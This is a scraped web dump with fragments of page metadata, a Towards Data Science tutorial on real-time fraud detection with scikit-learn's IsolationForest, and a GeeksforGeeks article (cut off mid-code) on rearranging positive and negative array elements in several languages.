32475, "s": 32469, "text": "jit_t" }, { "code": null, "e": 32489, "s": 32475, "text": "divyesh072019" }, { "code": null, "e": 32511, "s": 32489, "text": "two-pointer-algorithm" }, { "code": null, "e": 32518, "s": 32511, "text": "Arrays" }, { "code": null, "e": 32540, "s": 32518, "text": "two-pointer-algorithm" }, { "code": null, "e": 32547, "s": 32540, "text": "Arrays" }, { "code": null, "e": 32645, "s": 32547, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 32713, "s": 32645, "text": "Maximum and minimum of an array using minimum number of comparisons" }, { "code": null, "e": 32761, "s": 32713, "text": "Stack Data Structure (Introduction and Program)" }, { "code": null, "e": 32805, "s": 32761, "text": "Top 50 Array Coding Problems for Interviews" }, { "code": null, "e": 32837, "s": 32805, "text": "Multidimensional Arrays in Java" }, { "code": null, "e": 32860, "s": 32837, "text": "Introduction to Arrays" }, { "code": null, "e": 32874, "s": 32860, "text": "Linear Search" }, { "code": null, "e": 32919, "s": 32874, "text": "Python | Using 2D arrays/lists the right way" }, { "code": null, "e": 32940, "s": 32919, "text": "Linked List vs Array" }, { "code": null, "e": 32994, "s": 32940, "text": "Queue | Set 1 (Introduction and Array Implementation)" } ]
Real-time Fraud Detection With Machine Learning | by Kaushik Choudhury | Towards Data Science
Unlike our parents and grandparents, we live and breathe in the digital world. Initially, it was discussions on online forums, then chats and emails, and now most of our entire life and financial transactions are executed in digital mode. As the stakes are getting higher, it is not enough to detect fraud after the event. Imagine someone with a few confidential information about your bank or credit card details, able to execute a fraudulent transaction. Banks and insurance companies need tools and techniques to detect frauds in real-time to take appropriate actions. We humans lose the sense of interpretation and visualisation as we move beyond three-dimensional space. Today a financial transaction involves hundreds of parameters like transaction amount, past transaction trends, GPS location of the transaction, transaction time, merchant name etc. We need to consider many parameters to detect an anomaly and fraud in realtime. Isolation forest algorithm implemented in Scikit-Learn can help to identify the frauds in realtime and avoid financial loss. In this article, I will discuss step by step process of a fraudulent transaction with machine learning. Step 1: We need to import the packages which we are going to use. We will use “make_blobs” to generate our test data and will measure the accuracy of the fit model with accuracy_score. from sklearn.datasets import make_blobsfrom sklearn.metrics import accuracy_scorefrom sklearn.ensemble import IsolationForest Step 2: In real life, we base the model based on millions and billions of past transactions and hundreds of parameters. In this article, we will consider a hundred samples and four features to understand the core concept and the process. X, y = make_blobs(n_samples=[4,96], centers=[[5,3,3,10],[9,3,6,11]], n_features=4, random_state=0, shuffle="True") The array X holds values of the four parameters for a hundred records and, y stores whether it is a fraud or normal transaction. Step 3: We will use 300 base estimators (trees) in the ensemble and 10 number of samples from the dataset to train each base estimator. clf = IsolationForest(n_estimators=300,max_samples=10,random_state=0,max_features=4,contamination=0.1).fit(X) Also, we will use all four feature values (“max_feature” parameter) for the model. In projects, with feature engineering, the importance of each parameter is determined and ascertained the list of features on which model is to be based. I will not discuss the details of feature engineering in this article and will discuss it later in a separate article. The IsolationForest model is further fitted with the sample dataset. We set the value of the parameter “contamination” based on the proportion of the anomaly in historical data and stakes of missing anomaly against false alarms. Let say that proportion of fraud transaction in the historical dataset is 0.05 % and it is a very high stake transaction. In such a scenario, we may like to set the contamination value from 0.25 to 0.35. Setting the contamination value 5 to 7 times the anomaly proportion in historical data records will ensure that none of the rogue transaction is wrongly classified. Indeed setting a high contamination value compare to anomaly proportion also lead to increase few false alarms. In case the stakes are lower, then we may afford to miss to catch a few fraudulent transactions but decrease false alarms with lower contamination value. Step 4: In the below code, fitted IsolationForest model predicts whether a transaction is a fraud or normal transaction. IsolationForest predicts the anomaly as “-1” and normal transaction as “1”. In our sample test dataset, fraud transactions are codified as “0” and normal transactions as “1”. y_pred=clf.predict(X)y_pred[y_pred == -1] = 0 To compare the model prediction accuracy with actual classification from sample datasets, we will classify the predicted fraud transaction from “-1” to “0”. Step 5: As now the fraud transaction is labelled as “0 in the sample and predicted set, hence we can compare the prediction accuracy of the model directly with accuracy_score function. fraud_accuracy_prediction= round(accuracy_score(y,y_pred),2)print("The accuracy to detect fraud is {accuracy} %" .format (accuracy=fraud_accuracy_prediction*100)) It seems the model identified the fraud transaction with 93% accuracy. The prediction accuracy of the model may not look good enough on first glance, but remember as the stakes are higher, hence we are ok with few false alarms (false positive). These false alarms sacrifice the prediction accuracy, but it is better to be ultra-safe than missing a few frauds transactions. Step 6: We will use the confusion matrix to look deeper into the predictions. from sklearn.metrics import confusion_matrixprint(confusion_matrix(y, y_pred)) Out of the total 100 transactions in sample datasets, the model could identify all four true fraud transactions. Model labelled seven genuine transactions as fraud (false alarm) due to contamination (safety factor) parameter of 0.1 in the model. We have set the contamination value higher than the actual proportion of the fraud transaction in historical data as it is better to be safe than sorry in case stakes are higher. Step 7: We have written a small function to detect whether the new transaction is a fraud in realtime. It takes the parameter values of the new transaction feeds into the trained model to detect the authenticity of the transaction. def frauddetection(trans): transaction_type=(clf.predict([trans])) if transaction_type[0] < 0: print("Suspect fraud") else: print("Normal transaction") return Step 8: Various transaction parameters are collected at the time of the new transaction. frauddetection([7,4,3,8]) frauddetection([10,4,5,11]) The authenticity of the transaction is ascertained by calling the function defined earlier with transaction parameters. I have simplified a few things like the number of features in the transaction, the number of historical transaction to fit the model, feature engineering etc. to explain the core concept. We have seen the way isolation forest algorithm can help to detect fraudulent transactions in real-time. If you would like to know the way we can perform feature engineering with exploratory data analysis then read the article on Advanced Visualisation for Exploratory data analysis (EDA) .
[ { "code": null, "e": 410, "s": 171, "text": "Unlike our parents and grandparents, we live and breathe in the digital world. Initially, it was discussions on online forums, then chats and emails, and now most of our entire life and financial transactions are executed in digital mode." }, { "code": null, "e": 743, "s": 410, "text": "As the stakes are getting higher, it is not enough to detect fraud after the event. Imagine someone with a few confidential information about your bank or credit card details, able to execute a fraudulent transaction. Banks and insurance companies need tools and techniques to detect frauds in real-time to take appropriate actions." }, { "code": null, "e": 847, "s": 743, "text": "We humans lose the sense of interpretation and visualisation as we move beyond three-dimensional space." }, { "code": null, "e": 1109, "s": 847, "text": "Today a financial transaction involves hundreds of parameters like transaction amount, past transaction trends, GPS location of the transaction, transaction time, merchant name etc. We need to consider many parameters to detect an anomaly and fraud in realtime." }, { "code": null, "e": 1338, "s": 1109, "text": "Isolation forest algorithm implemented in Scikit-Learn can help to identify the frauds in realtime and avoid financial loss. In this article, I will discuss step by step process of a fraudulent transaction with machine learning." }, { "code": null, "e": 1523, "s": 1338, "text": "Step 1: We need to import the packages which we are going to use. We will use “make_blobs” to generate our test data and will measure the accuracy of the fit model with accuracy_score." }, { "code": null, "e": 1649, "s": 1523, "text": "from sklearn.datasets import make_blobsfrom sklearn.metrics import accuracy_scorefrom sklearn.ensemble import IsolationForest" }, { "code": null, "e": 1887, "s": 1649, "text": "Step 2: In real life, we base the model based on millions and billions of past transactions and hundreds of parameters. In this article, we will consider a hundred samples and four features to understand the core concept and the process." }, { "code": null, "e": 2002, "s": 1887, "text": "X, y = make_blobs(n_samples=[4,96], centers=[[5,3,3,10],[9,3,6,11]], n_features=4, random_state=0, shuffle=\"True\")" }, { "code": null, "e": 2131, "s": 2002, "text": "The array X holds values of the four parameters for a hundred records and, y stores whether it is a fraud or normal transaction." }, { "code": null, "e": 2267, "s": 2131, "text": "Step 3: We will use 300 base estimators (trees) in the ensemble and 10 number of samples from the dataset to train each base estimator." }, { "code": null, "e": 2377, "s": 2267, "text": "clf = IsolationForest(n_estimators=300,max_samples=10,random_state=0,max_features=4,contamination=0.1).fit(X)" }, { "code": null, "e": 2802, "s": 2377, "text": "Also, we will use all four feature values (“max_feature” parameter) for the model. In projects, with feature engineering, the importance of each parameter is determined and ascertained the list of features on which model is to be based. I will not discuss the details of feature engineering in this article and will discuss it later in a separate article. The IsolationForest model is further fitted with the sample dataset." }, { "code": null, "e": 3597, "s": 2802, "text": "We set the value of the parameter “contamination” based on the proportion of the anomaly in historical data and stakes of missing anomaly against false alarms. Let say that proportion of fraud transaction in the historical dataset is 0.05 % and it is a very high stake transaction. In such a scenario, we may like to set the contamination value from 0.25 to 0.35. Setting the contamination value 5 to 7 times the anomaly proportion in historical data records will ensure that none of the rogue transaction is wrongly classified. Indeed setting a high contamination value compare to anomaly proportion also lead to increase few false alarms. In case the stakes are lower, then we may afford to miss to catch a few fraudulent transactions but decrease false alarms with lower contamination value." }, { "code": null, "e": 3893, "s": 3597, "text": "Step 4: In the below code, fitted IsolationForest model predicts whether a transaction is a fraud or normal transaction. IsolationForest predicts the anomaly as “-1” and normal transaction as “1”. In our sample test dataset, fraud transactions are codified as “0” and normal transactions as “1”." }, { "code": null, "e": 3939, "s": 3893, "text": "y_pred=clf.predict(X)y_pred[y_pred == -1] = 0" }, { "code": null, "e": 4096, "s": 3939, "text": "To compare the model prediction accuracy with actual classification from sample datasets, we will classify the predicted fraud transaction from “-1” to “0”." }, { "code": null, "e": 4281, "s": 4096, "text": "Step 5: As now the fraud transaction is labelled as “0 in the sample and predicted set, hence we can compare the prediction accuracy of the model directly with accuracy_score function." }, { "code": null, "e": 4445, "s": 4281, "text": "fraud_accuracy_prediction= round(accuracy_score(y,y_pred),2)print(\"The accuracy to detect fraud is {accuracy} %\" .format (accuracy=fraud_accuracy_prediction*100))" }, { "code": null, "e": 4818, "s": 4445, "text": "It seems the model identified the fraud transaction with 93% accuracy. The prediction accuracy of the model may not look good enough on first glance, but remember as the stakes are higher, hence we are ok with few false alarms (false positive). These false alarms sacrifice the prediction accuracy, but it is better to be ultra-safe than missing a few frauds transactions." }, { "code": null, "e": 4896, "s": 4818, "text": "Step 6: We will use the confusion matrix to look deeper into the predictions." }, { "code": null, "e": 4975, "s": 4896, "text": "from sklearn.metrics import confusion_matrixprint(confusion_matrix(y, y_pred))" }, { "code": null, "e": 5088, "s": 4975, "text": "Out of the total 100 transactions in sample datasets, the model could identify all four true fraud transactions." }, { "code": null, "e": 5400, "s": 5088, "text": "Model labelled seven genuine transactions as fraud (false alarm) due to contamination (safety factor) parameter of 0.1 in the model. We have set the contamination value higher than the actual proportion of the fraud transaction in historical data as it is better to be safe than sorry in case stakes are higher." }, { "code": null, "e": 5632, "s": 5400, "text": "Step 7: We have written a small function to detect whether the new transaction is a fraud in realtime. It takes the parameter values of the new transaction feeds into the trained model to detect the authenticity of the transaction." }, { "code": null, "e": 5818, "s": 5632, "text": "def frauddetection(trans): transaction_type=(clf.predict([trans])) if transaction_type[0] < 0: print(\"Suspect fraud\") else: print(\"Normal transaction\") return" }, { "code": null, "e": 5907, "s": 5818, "text": "Step 8: Various transaction parameters are collected at the time of the new transaction." }, { "code": null, "e": 5963, "s": 5907, "text": "frauddetection([7,4,3,8]) frauddetection([10,4,5,11])" }, { "code": null, "e": 6083, "s": 5963, "text": "The authenticity of the transaction is ascertained by calling the function defined earlier with transaction parameters." }, { "code": null, "e": 6376, "s": 6083, "text": "I have simplified a few things like the number of features in the transaction, the number of historical transaction to fit the model, feature engineering etc. to explain the core concept. We have seen the way isolation forest algorithm can help to detect fraudulent transactions in real-time." } ]
Count distinct entries in SAP BusinessObjects
Your requirement is not clear but I think you should use AND operator and count on this in the third column. Your formula should be like this =([First_Seen] = 1) and ([Authorized] = 1) Consuming Graphical calculation view via SDA
[ { "code": null, "e": 1204, "s": 1062, "text": "Your requirement is not clear but I think you should use AND operator and count on this in the third column. Your formula should be like this" }, { "code": null, "e": 1247, "s": 1204, "text": "=([First_Seen] = 1) and ([Authorized] = 1)" }, { "code": null, "e": 1292, "s": 1247, "text": "Consuming Graphical calculation view via SDA" } ]
How to remove single quote from string column in an R data frame?
Sometimes column values in an R data frame have single quote associated with them and to perform the analysis we need to remove that quote. Therefore, to remove single quote from string column, we can use gsub function by defining the single quote and replacing it with blank(not space) as shown in the below examples. Consider the below data frame − Live Demo x1<-sample(c("India'","Sudan'","Croatia'"),20,replace=TRUE) x2<-rpois(20,5) df1<-data.frame(x1,x2) df1 x1 x2 1 India' 6 2 Sudan' 3 3 Croatia' 9 4 Croatia' 3 5 Sudan' 4 6 Croatia' 4 7 India' 4 8 Croatia' 6 9 India' 4 10 Croatia' 7 11 Sudan' 8 12 India' 3 13 Croatia' 4 14 Sudan' 6 15 Sudan' 3 16 India' 11 17 Croatia' 8 18 Sudan' 6 19 Sudan' 10 20 Sudan' 5 Removing ' from column x1 in df1 − df1$x1<-gsub("'","",df1$x1) df1 x1 x2 1 India 6 2 Sudan 3 3 Croatia 9 4 Croatia 3 5 Sudan 4 6 Croatia 4 7 India 4 8 Croatia 6 9 India 4 10 Croatia 7 11 Sudan 8 12 India 3 13 Croatia 4 14 Sudan 6 15 Sudan 3 16 India 11 17 Croatia 8 18 Sudan 6 19 Sudan 10 20 Sudan 5 Live Demo y1<-sample(c("'A'","'B'","'C'"),20,replace=TRUE) y2<-rnorm(20,1) df2<-data.frame(y1,y2) df2 y1 y2 1 'B' 0.49282668 2 'B' -0.90061585 3 'B' 0.89346759 4 'A' 1.96469552 5 'A' 1.21931750 6 'A' 0.32022463 7 'A' 0.97912117 8 'B' 1.38781374 9 'C' -0.69066318 10 'B' 1.45014864 11 'C' 1.61876980 12 'C' 1.69046763 13 'C' -0.08073507 14 'B' 1.73212908 15 'C' 0.85473489 16 'B' -0.24975030 17 'A' 0.40313471 18 'B' 0.60537047 19 'B' 0.30200882 20 'C' 2.29497113 Removing ' from column y1 in df2 − df2$y1<-gsub("'","",df2$y1) df2 y1 y2 1 B 0.49282668 2 B -0.90061585 3 B 0.89346759 4 A 1.96469552 5 A 1.21931750 6 A 0.32022463 7 A 0.97912117 8 B 1.38781374 9 C -0.69066318 10 B 1.45014864 11 C 1.61876980 12 C 1.69046763 13 C -0.08073507 14 B 1.73212908 15 C 0.85473489 16 B -0.24975030 17 A 0.40313471 18 B 0.60537047 19 B 0.30200882 20 C 2.29497113
[ { "code": null, "e": 1381, "s": 1062, "text": "Sometimes column values in an R data frame have single quote associated with them and to perform the analysis we need to remove that quote. Therefore, to remove single quote from string column, we can use gsub function by defining the single quote and replacing it with blank(not space) as shown in the below examples." }, { "code": null, "e": 1413, "s": 1381, "text": "Consider the below data frame −" }, { "code": null, "e": 1424, "s": 1413, "text": " Live Demo" }, { "code": null, "e": 1527, "s": 1424, "text": "x1<-sample(c(\"India'\",\"Sudan'\",\"Croatia'\"),20,replace=TRUE)\nx2<-rpois(20,5)\ndf1<-data.frame(x1,x2)\ndf1" }, { "code": null, "e": 1823, "s": 1527, "text": " x1 x2\n1 India' 6\n2 Sudan' 3\n3 Croatia' 9\n4 Croatia' 3\n5 Sudan' 4\n6 Croatia' 4\n7 India' 4\n8 Croatia' 6\n9 India' 4\n10 Croatia' 7\n11 Sudan' 8\n12 India' 3\n13 Croatia' 4\n14 Sudan' 6\n15 Sudan' 3\n16 India' 11\n17 Croatia' 8\n18 Sudan' 6\n19 Sudan' 10\n20 Sudan' 5" }, { "code": null, "e": 1858, "s": 1823, "text": "Removing ' from column x1 in df1 −" }, { "code": null, "e": 1890, "s": 1858, "text": "df1$x1<-gsub(\"'\",\"\",df1$x1)\ndf1" }, { "code": null, "e": 2164, "s": 1890, "text": " x1 x2\n1 India 6\n2 Sudan 3\n3 Croatia 9\n4 Croatia 3\n5 Sudan 4\n6 Croatia 4\n7 India 4\n8 Croatia 6\n9 India 4\n10 Croatia 7\n11 Sudan 8\n12 India 3\n13 Croatia 4\n14 Sudan 6\n15 Sudan 3\n16 India 11\n17 Croatia 8\n18 Sudan 6\n19 Sudan 10\n20 Sudan 5" }, { "code": null, "e": 2175, "s": 2164, "text": " Live Demo" }, { "code": null, "e": 2267, "s": 2175, "text": "y1<-sample(c(\"'A'\",\"'B'\",\"'C'\"),20,replace=TRUE)\ny2<-rnorm(20,1)\ndf2<-data.frame(y1,y2)\ndf2" }, { "code": null, "e": 2700, "s": 2267, "text": " y1 y2\n1 'B' 0.49282668\n2 'B' -0.90061585\n3 'B' 0.89346759\n4 'A' 1.96469552\n5 'A' 1.21931750\n6 'A' 0.32022463\n7 'A' 0.97912117\n8 'B' 1.38781374\n9 'C' -0.69066318\n10 'B' 1.45014864\n11 'C' 1.61876980\n12 'C' 1.69046763\n13 'C' -0.08073507\n14 'B' 1.73212908\n15 'C' 0.85473489\n16 'B' -0.24975030\n17 'A' 0.40313471\n18 'B' 0.60537047\n19 'B' 0.30200882\n20 'C' 2.29497113" }, { "code": null, "e": 2735, "s": 2700, "text": "Removing ' from column y1 in df2 −" }, { "code": null, "e": 2767, "s": 2735, "text": "df2$y1<-gsub(\"'\",\"\",df2$y1)\ndf2" }, { "code": null, "e": 3180, "s": 2767, "text": " y1 y2\n1 B 0.49282668\n2 B -0.90061585\n3 B 0.89346759\n4 A 1.96469552\n5 A 1.21931750\n6 A 0.32022463\n7 A 0.97912117\n8 B 1.38781374\n9 C -0.69066318\n10 B 1.45014864\n11 C 1.61876980\n12 C 1.69046763\n13 C -0.08073507\n14 B 1.73212908\n15 C 0.85473489\n16 B -0.24975030\n17 A 0.40313471\n18 B 0.60537047\n19 B 0.30200882\n20 C 2.29497113" } ]
Rearrange positive and negative numbers using inbuilt sort function - GeeksforGeeks
03 Sep, 2021 Given an array of positive and negative numbers, arrange them such that all negative integers appear before all the positive integers in the array without using any additional data structure like a hash table, arrays, etc. The order of appearance should be maintained.Examples: Input : arr[] = [12, 11, -13, -5, 6, -7, 5, -3, -6] Output : arr[] = [-13, -5, -7, -3, -6, 12, 11, 6, 5] Input : arr[] = [-12, 11, 0, -5, 6, -7, 5, -3, -6] Output : arr[] = [-12, -5, -7, -3, -6, 0, 11, 6, 5] Previous Approaches: Some approaches have already been discussed here. They were implemented at best.Approach 3: There is another method to do so. In c++ STL, There is an inbuilt function std::sort(). We can modify the comp() function to obtain the desired result. As we have to place negative numbers first and then positive numbers. We also have to keep zero’s(if present) between positive and negative numbers.The comp() function in this code rearranges the given array in the required order. Here in bool comp(int a, int b), if integer ‘a’ is of j-th index and integer ‘b’ is of i-th index elements in the arr[], then j>i. comp() function will be called in this way. If the comp() return true then swap will be done. C++ // CPP program to rearrange positive// and negative integers keeping// order of elements.#include <bits/stdc++.h> using namespace std; bool comp(int a, int b){ // swap not neededif((a > 0 && b > 0) || (a < 0 && b < 0) || (a > 0 && b < 0 ))return false; // swap neededif(a < 0 && b > 0)return true; // swap not neededif((a == 0 && b < 0) || (a > 0 && b == 0))return false; // swap neededif((a == 0 && b > 0) || (a < 0 && b == 0))return true; } void rearrange(int arr[], int n){ sort(arr, arr + n, comp);} // Driver codeint main(){ int arr[] = { -12, 11, -13, -5, 6, -7, 5, -3, -6 }; int n = sizeof(arr) / sizeof(arr[0]); rearrange(arr, n); for (int i = 0; i < n; i++) cout << " " << arr[i]; return 0;} -12 -13 -5 -7 -3 -6 11 6 5 Time complexity is the same as sorting i.e. O(n log n). As we are using the standard sort function. But it is really faster because the inbuilt sort function uses introsort.Approach 4: There is yet another method to solve this problem. We recursively traverse the array cutting it into two halves (array[start..start] & array[(start + 1)..end], and keep on splitting the array till we reach the last element. Then we start merging it back. The idea is to, at any point, keep the array in the proper sequence of negative and positive integers. The merging logic would be:(I) If the array[start] is negative, merge the rest of the array as it is so that the negative numbers’ order is maintained. The reason for this is that since we are tracing back from the recursive calls, we start moving right to left through the array, thus, naturally maintaining the original sequence.(II) If the array[start] is positive, merge the rest of the array, but, after right-rotating the half of the array[(start + 1)..end]. The idea for the rotation is to merge the array so that the positive array[start] is always merged with the positive elements. But, the only thing here is that the merged array will have all the positive elements on the left and negative elements on the right. So we reverse the sequence in each recursion to get back the original sequence of negative elements and then positive elements subsequently.It can be observed since we reverse the array while merging with a positive first element in each recursion, so the sequence of positive elements, although coming after the negative elements, are in reverse order. So, as a final step, we reverse only the positive half of the final array, and, subsequently getting the intended sequence.Below is the implementation of the above approach: C++ Java Python3 C# Javascript // C++ implementation of// the above approach#include <iostream> void printArray(int array[], int length){ std::cout << "["; for(int i = 0; i < length; i++) { std::cout << array[i]; if(i < (length - 1)) std::cout << ", "; else std::cout << "]" << std::endl; }} void reverse(int array[], int start, int end){ while(start < end) { int temp = array[start]; array[start] = array[end]; array[end] = temp; start++; end--; }} // Rearrange the array with all negative integers// on left and positive integers on right// use recursion to split the array with first element// as one half and the rest array as another and then// merge it with head of the array in each step void rearrange(int array[], int start, int end){ // exit condition if(start == end) return; // rearrange the array except the first // element in each recursive call rearrange(array, (start + 1), end); // If the first element of the array is positive, // then right-rotate the array by one place first // and then reverse the merged array. if(array[start] >= 0) { reverse(array, (start + 1), end); reverse(array, start, end); }} // Driver codeint main(){ int array[] = {-12, -11, -13, -5, -6, 7, 5, 3, 6}; int length = (sizeof(array) / sizeof(array[0])); int countNegative = 0; for(int i = 0; i < length; i++) { if(array[i] < 0) countNegative++; } std::cout << "array: "; printArray(array, length); rearrange(array, 0, (length - 1)); reverse(array, countNegative, (length - 1)); std::cout << "rearranged array: "; printArray(array, length); return 0;} // Java program to implement the// above approachimport java.io.*;class GFG{ static void printArray(int[] array, int length){ System.out.print("["); for (int i = 0; i < length; i++) { System.out.print(array[i]); if (i < (length - 1)) System.out.print(","); else System.out.print("]\n"); }} static void reverse(int[] array, int start, int end){ while (start < end) { int temp = array[start]; array[start] = array[end]; array[end] = temp; start++; end--; }} // Rearrange the array with// all negative integers on left// and positive integers on right// use recursion to split the// array with first element// as one half and the rest// array as another and then// merge it with head of// the array in each stepstatic void rearrange(int[] array, int start, int end){ // exit condition if (start == end) return; // rearrange the array // except the first element // in each recursive call rearrange(array, (start + 1), end); // If the first element of // the array is positive, // then right-rotate the // array by one place first // and then reverse the merged array. if (array[start] >= 0) { reverse(array, (start + 1), end); reverse(array, start, end); }} // Driver codepublic static void main(String[] args){ int[] array = {-12, -11, -13, -5, -6, 7, 5, 3, 6}; int length = array.length; int countNegative = 0; for (int i = 0; i < length; i++) { if (array[i] < 0) countNegative++; } System.out.print("array: "); printArray(array, length); rearrange(array, 0, (length - 1)); reverse(array, countNegative, (length - 1)); System.out.print("rearranged array: "); printArray(array, length);}} // This code is contributed by Chitranayal # Python3 implementation of the above approachdef printArray(array, length): print("[", end = "") for i in range(length): print(array[i], end = "") if(i < (length - 1)): print(",", end = " ") else: print("]") def reverse(array, start, end): while(start < end): temp = array[start] array[start] = array[end] array[end] = temp start += 1 end -= 1 # Rearrange the array with all negative integers# on left and positive integers on right# use recursion to split the array with first element# as one half and the rest array as another and then# merge it with head of the array in each stepdef rearrange(array, start, end): # exit condition if(start == end): return # rearrange the array except the first # element in each recursive call rearrange(array, (start + 1), end) # If the first element of the array is positive, # then right-rotate the array by one place first # and then reverse the merged array. if(array[start] >= 0): reverse(array, (start + 1), end) reverse(array, start, end) # Driver codeif __name__ == '__main__': array = [-12, -11, -13, -5, -6, 7, 5, 3, 6] length = len(array) countNegative = 0 for i in range(length): if(array[i] < 0): countNegative += 1 print("array: ", end = "") printArray(array, length) rearrange(array, 0, (length - 1)) reverse(array, countNegative, (length - 1)) print("rearranged array: ", end = "") printArray(array, length) # This code is contributed by mohit kumar 29 // C# implementation of// the above approachusing System;class GFG{ static void printArray(int []array, int length){ Console.Write("["); for(int i = 0; i < length; i++) { Console.Write(array[i]); if(i < (length - 1)) Console.Write(","); else Console.Write("]\n"); }} static void reverse(int []array, int start, int end){ while(start < end) { int temp = array[start]; array[start] = array[end]; array[end] = temp; start++; end--; }} // Rearrange the array with// all negative integers on left// and positive integers on right// use recursion to split the// array with first element// as one half and the rest// array as another and then// merge it with head of// the array in each step static void rearrange(int []array, int start, int end){ // exit condition if(start == end) return; // rearrange the array // except the first element // in each recursive call rearrange(array, (start + 1), end); // If the first element of // the array is positive, // then right-rotate the // array by one place first // and then reverse the merged array. if(array[start] >= 0) { reverse(array, (start + 1), end); reverse(array, start, end); }} // Driver codepublic static void Main(string[] args){ int []array = {-12, -11, -13, -5, -6, 7, 5, 3, 6}; int length = array.Length; int countNegative = 0; for(int i = 0; i < length; i++) { if(array[i] < 0) countNegative++; } Console.Write("array: "); printArray(array, length); rearrange(array, 0, (length - 1)); reverse(array, countNegative, (length - 1)); Console.Write("rearranged array: "); printArray(array, length);}} // This code is contributed by Rutvik_56 <script>// Javascript program to implement the// above approachfunction printArray(array, Length){ document.write("["); for (let i = 0; i < Length; i++) { document.write(array[i]); if (i < (Length - 1)) document.write(","); else document.write("]<br>"); }} function reverse(array,start,end){ while (start < end) { let temp = array[start]; array[start] = array[end]; array[end] = temp; start++; end--; }} // Rearrange the array with// all negative integers on left// and positive integers on right// use recursion to split the// array with first element// as one half and the rest// array as another and then// merge it with head of// the array in each stepfunction rearrange(array,start,end){ // exit condition if (start == end) return; // rearrange the array // except the first element // in each recursive call rearrange(array, (start + 1), end); // If the first element of // the array is positive, // then right-rotate the // array by one place first // and then reverse the merged array. if (array[start] >= 0) { reverse(array, (start + 1), end); reverse(array, start, end); }} // Driver codelet array = [-12, -11, -13, -5, -6, 7, 5, 3, 6];let length = array.length;let countNegative = 0;for (let i = 0; i < length; i++) { if (array[i] < 0) countNegative++; } document.write("array: "); printArray(array, length); rearrange(array, 0, (length - 1)); reverse(array, countNegative, (length - 1)); document.write("rearranged array: "); printArray(array, length); // This code is contributed by rag2127.</script> array: [-12, -11, -13, -5, -6, 7, 5, 3, 6] rearranged array: [-12, -11, -13, -5, -6, 7, 5, 3, 6] Time complexity: O(N^2)This article is contributed by abhijeet kaurav. If you like GeeksforGeeks and would like to contribute, you can also write an article using write.geeksforgeeks.org or mail your article to [email protected]. See your article appearing on the GeeksforGeeks main page and help other Geeks.Please write comments if you find anything incorrect, or you want to share more information about the topic discussed above. array-rearrange STL Arrays Sorting Arrays Sorting STL Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Comments Old Comments Introduction to Arrays Linked List vs Array Python | Using 2D arrays/lists the right way Queue | Set 1 (Introduction and Array Implementation) Subset Sum Problem | DP-25
[ { "code": null, "e": 25127, "s": 25099, "text": "\n03 Sep, 2021" }, { "code": null, "e": 25405, "s": 25127, "text": "Given an array of positive and negative numbers, arrange them such that all negative integers appear before all the positive integers in the array without using any additional data structure like a hash table, arrays, etc. The order of appearance should be maintained.Examples:" }, { "code": null, "e": 25617, "s": 25405, "text": "Input : arr[] = [12, 11, -13, -5, 6, -7, 5, -3, -6]\nOutput : arr[] = [-13, -5, -7, -3, -6, 12, 11, 6, 5]\n\nInput : arr[] = [-12, 11, 0, -5, 6, -7, 5, -3, -6]\nOutput : arr[] = [-12, -5, -7, -3, -6, 0, 11, 6, 5]" }, { "code": null, "e": 26339, "s": 25617, "text": "Previous Approaches: Some approaches have already been discussed here. They were implemented at best.Approach 3: There is another method to do so. In c++ STL, There is an inbuilt function std::sort(). We can modify the comp() function to obtain the desired result. As we have to place negative numbers first and then positive numbers. We also have to keep zero’s(if present) between positive and negative numbers.The comp() function in this code rearranges the given array in the required order. Here in bool comp(int a, int b), if integer ‘a’ is of j-th index and integer ‘b’ is of i-th index elements in the arr[], then j>i. comp() function will be called in this way. If the comp() return true then swap will be done. " }, { "code": null, "e": 26343, "s": 26339, "text": "C++" }, { "code": "// CPP program to rearrange positive// and negative integers keeping// order of elements.#include <bits/stdc++.h> using namespace std; bool comp(int a, int b){ // swap not neededif((a > 0 && b > 0) || (a < 0 && b < 0) || (a > 0 && b < 0 ))return false; // swap neededif(a < 0 && b > 0)return true; // swap not neededif((a == 0 && b < 0) || (a > 0 && b == 0))return false; // swap neededif((a == 0 && b > 0) || (a < 0 && b == 0))return true; } void rearrange(int arr[], int n){ sort(arr, arr + n, comp);} // Driver codeint main(){ int arr[] = { -12, 11, -13, -5, 6, -7, 5, -3, -6 }; int n = sizeof(arr) / sizeof(arr[0]); rearrange(arr, n); for (int i = 0; i < n; i++) cout << \" \" << arr[i]; return 0;}", "e": 27095, "s": 26343, "text": null }, { "code": null, "e": 27122, "s": 27095, "text": "-12 -13 -5 -7 -3 -6 11 6 5" }, { "code": null, "e": 28923, "s": 27124, "text": "Time complexity is the same as sorting i.e. O(n log n). As we are using the standard sort function. But it is really faster because the inbuilt sort function uses introsort.Approach 4: There is yet another method to solve this problem. We recursively traverse the array cutting it into two halves (array[start..start] & array[(start + 1)..end], and keep on splitting the array till we reach the last element. Then we start merging it back. The idea is to, at any point, keep the array in the proper sequence of negative and positive integers. The merging logic would be:(I) If the array[start] is negative, merge the rest of the array as it is so that the negative numbers’ order is maintained. The reason for this is that since we are tracing back from the recursive calls, we start moving right to left through the array, thus, naturally maintaining the original sequence.(II) If the array[start] is positive, merge the rest of the array, but, after right-rotating the half of the array[(start + 1)..end]. The idea for the rotation is to merge the array so that the positive array[start] is always merged with the positive elements. But, the only thing here is that the merged array will have all the positive elements on the left and negative elements on the right. So we reverse the sequence in each recursion to get back the original sequence of negative elements and then positive elements subsequently.It can be observed since we reverse the array while merging with a positive first element in each recursion, so the sequence of positive elements, although coming after the negative elements, are in reverse order. So, as a final step, we reverse only the positive half of the final array, and, subsequently getting the intended sequence.Below is the implementation of the above approach: " }, { "code": null, "e": 28927, "s": 28923, "text": "C++" }, { "code": null, "e": 28932, "s": 28927, "text": "Java" }, { "code": null, "e": 28940, "s": 28932, "text": "Python3" }, { "code": null, "e": 28943, "s": 28940, "text": "C#" }, { "code": null, "e": 28954, "s": 28943, "text": "Javascript" }, { "code": "// C++ implementation of// the above approach#include <iostream> void printArray(int array[], int length){ std::cout << \"[\"; for(int i = 0; i < length; i++) { std::cout << array[i]; if(i < (length - 1)) std::cout << \", \"; else std::cout << \"]\" << std::endl; }} void reverse(int array[], int start, int end){ while(start < end) { int temp = array[start]; array[start] = array[end]; array[end] = temp; start++; end--; }} // Rearrange the array with all negative integers// on left and positive integers on right// use recursion to split the array with first element// as one half and the rest array as another and then// merge it with head of the array in each step void rearrange(int array[], int start, int end){ // exit condition if(start == end) return; // rearrange the array except the 